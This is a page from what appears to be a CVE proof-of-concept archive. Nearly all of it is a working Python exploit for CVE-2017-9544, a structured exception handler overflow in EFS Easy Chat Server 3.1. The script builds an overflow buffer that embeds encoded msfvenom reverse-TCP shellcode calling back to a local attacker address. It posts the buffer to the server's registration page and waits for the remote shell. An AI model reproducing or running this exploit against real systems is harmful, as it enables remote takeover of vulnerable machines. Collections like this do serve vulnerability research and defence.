4837 Total CVEs
26 Years
GitHub
Home / 2017 / CVE-2017-9544
README.md
Rendering markdown...
POC / main.py PY
⬇ Raw GitHub ✕ Close 
#!/usr/bin/env python
#
# CVE-2017-9544 exploit based on:
# * pwntools
# * metasploit reverse_tcp payload
# * EFS Easy Chat Server 3.1 from https://www.exploit-db.com/exploits/42155

import pwn
import requests
import urllib
from threading import Thread


def generate_payload():
    params = "UserName={}&Password=test&Password1=test&Sex=1&Email=x@&" \
            + "Icon=x.gif&Resume=xxxx&cw=1&RoomID=4&RepUserName=admin" \
            + "&submit1=Register"

    SE_handler = pwn.p32(0x10017f21)
    payload = 'A' * 217
    payload += pwn.asm("jmp $+16; nop; nop")  # trampoline over few bytes
    payload += SE_handler

    # msfvenom -p windows/shell_reverse_tcp EXITFUNC=seh LHOST=192.168.15.101
    # LPORT=4444 -f python -v shellcode -a x86 --platform windows
    # -e x86/alpha_mixed
    shellcode = "\x90" * 10
    shellcode += "\x89\xe1\xd9\xc8\xd9\x71\xf4\x5e\x56\x59\x49\x49"
    shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
    shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
    shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
    shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
    shellcode += "\x4b\x4c\x4d\x38\x6c\x42\x67\x70\x43\x30\x55\x50"
    shellcode += "\x55\x30\x6f\x79\x6d\x35\x70\x31\x79\x50\x73\x54"
    shellcode += "\x6c\x4b\x66\x30\x30\x30\x4c\x4b\x71\x42\x76\x6c"
    shellcode += "\x6e\x6b\x52\x72\x34\x54\x6c\x4b\x32\x52\x36\x48"
    shellcode += "\x54\x4f\x4e\x57\x53\x7a\x51\x36\x64\x71\x49\x6f"
    shellcode += "\x6e\x4c\x47\x4c\x55\x31\x33\x4c\x74\x42\x64\x6c"
    shellcode += "\x37\x50\x59\x51\x48\x4f\x36\x6d\x47\x71\x79\x57"
    shellcode += "\x79\x72\x38\x72\x33\x62\x71\x47\x4e\x6b\x52\x72"
    shellcode += "\x36\x70\x6e\x6b\x72\x6a\x55\x6c\x4e\x6b\x42\x6c"
    shellcode += "\x44\x51\x70\x78\x38\x63\x71\x58\x73\x31\x58\x51"
    shellcode += "\x52\x71\x6e\x6b\x46\x39\x55\x70\x63\x31\x48\x53"
    shellcode += "\x6e\x6b\x30\x49\x62\x38\x59\x73\x77\x4a\x70\x49"
    shellcode += "\x6c\x4b\x64\x74\x4c\x4b\x55\x51\x59\x46\x76\x51"
    shellcode += "\x69\x6f\x4c\x6c\x79\x51\x48\x4f\x76\x6d\x33\x31"
    shellcode += "\x5a\x67\x50\x38\x59\x70\x43\x45\x4b\x46\x47\x73"
    shellcode += "\x53\x4d\x79\x68\x35\x6b\x43\x4d\x37\x54\x70\x75"
    shellcode += "\x6a\x44\x52\x78\x4c\x4b\x32\x78\x67\x54\x47\x71"
    shellcode += "\x6e\x33\x50\x66\x4e\x6b\x46\x6c\x70\x4b\x4e\x6b"
    shellcode += "\x71\x48\x55\x4c\x35\x51\x79\x43\x6e\x6b\x67\x74"
    shellcode += "\x4e\x6b\x45\x51\x38\x50\x6b\x39\x32\x64\x65\x74"
    shellcode += "\x67\x54\x53\x6b\x61\x4b\x75\x31\x56\x39\x73\x6a"
    shellcode += "\x50\x51\x69\x6f\x4b\x50\x43\x6f\x33\x6f\x52\x7a"
    shellcode += "\x4c\x4b\x54\x52\x38\x6b\x6c\x4d\x31\x4d\x72\x48"
    shellcode += "\x35\x63\x75\x62\x73\x30\x35\x50\x50\x68\x63\x47"
    shellcode += "\x52\x53\x66\x52\x63\x6f\x53\x64\x51\x78\x70\x4c"
    shellcode += "\x30\x77\x76\x46\x75\x57\x6b\x4f\x4b\x65\x4e\x58"
    shellcode += "\x6a\x30\x45\x51\x73\x30\x53\x30\x77\x59\x59\x54"
    shellcode += "\x31\x44\x56\x30\x70\x68\x64\x69\x6f\x70\x72\x4b"
    shellcode += "\x73\x30\x6b\x4f\x39\x45\x62\x70\x30\x50\x56\x30"
    shellcode += "\x70\x50\x43\x70\x70\x50\x37\x30\x66\x30\x63\x58"
    shellcode += "\x5a\x4a\x44\x4f\x59\x4f\x59\x70\x39\x6f\x79\x45"
    shellcode += "\x4a\x37\x51\x7a\x34\x45\x55\x38\x6b\x70\x79\x38"
    shellcode += "\x74\x4f\x73\x55\x63\x58\x34\x42\x55\x50\x37\x61"
    shellcode += "\x71\x4c\x4e\x69\x38\x66\x51\x7a\x52\x30\x72\x76"
    shellcode += "\x56\x37\x53\x58\x6a\x39\x6e\x45\x31\x64\x55\x31"
    shellcode += "\x59\x6f\x4a\x75\x6f\x75\x69\x50\x34\x34\x66\x6c"
    shellcode += "\x79\x6f\x32\x6e\x34\x48\x62\x55\x7a\x4c\x32\x48"
    shellcode += "\x5a\x50\x4e\x55\x4c\x62\x53\x66\x4b\x4f\x5a\x75"
    shellcode += "\x30\x68\x53\x53\x62\x4d\x71\x74\x57\x70\x6b\x39"
    shellcode += "\x4b\x53\x56\x37\x70\x57\x50\x57\x46\x51\x48\x76"
    shellcode += "\x32\x4a\x42\x32\x62\x79\x36\x36\x4b\x52\x79\x6d"
    shellcode += "\x35\x36\x4f\x37\x51\x54\x44\x64\x45\x6c\x53\x31"
    shellcode += "\x35\x51\x4e\x6d\x73\x74\x37\x54\x56\x70\x49\x56"
    shellcode += "\x57\x70\x33\x74\x66\x34\x30\x50\x63\x66\x56\x36"
    shellcode += "\x33\x66\x70\x46\x76\x36\x32\x6e\x66\x36\x51\x46"
    shellcode += "\x56\x33\x50\x56\x72\x48\x43\x49\x38\x4c\x55\x6f"
    shellcode += "\x4d\x56\x39\x6f\x49\x45\x6f\x79\x6d\x30\x62\x6e"
    shellcode += "\x72\x76\x42\x66\x39\x6f\x34\x70\x73\x58\x73\x38"
    shellcode += "\x6f\x77\x47\x6d\x73\x50\x4b\x4f\x78\x55\x6d\x6b"
    shellcode += "\x4b\x4e\x54\x4e\x70\x32\x58\x6a\x32\x48\x4f\x56"
    shellcode += "\x6d\x45\x4f\x4d\x6f\x6d\x49\x6f\x4a\x75\x65\x6c"
    shellcode += "\x55\x56\x61\x6c\x74\x4a\x4d\x50\x79\x6b\x79\x70"
    shellcode += "\x72\x55\x66\x65\x6d\x6b\x51\x57\x45\x43\x44\x32"
    shellcode += "\x72\x4f\x51\x7a\x53\x30\x33\x63\x6b\x4f\x4a\x75"
    shellcode += "\x41\x41"

    payload += shellcode

    return params.format(urllib.quote_plus(payload))


def attack():
    URL = "http://{}:{}/registresult.htm".format(RHOST, RPORT)
    requests.post(URL, data=generate_payload())


if __name__ == "__main__":
    # set target info
    RHOST = '192.168.15.100'
    RPORT = 80
    LPORT = 4444

    thread = Thread(target=attack)
    thread.start()

    listener = pwn.listen(port=LPORT)
    listener.wait_for_connection()
    listener.interactive()

    thread.join()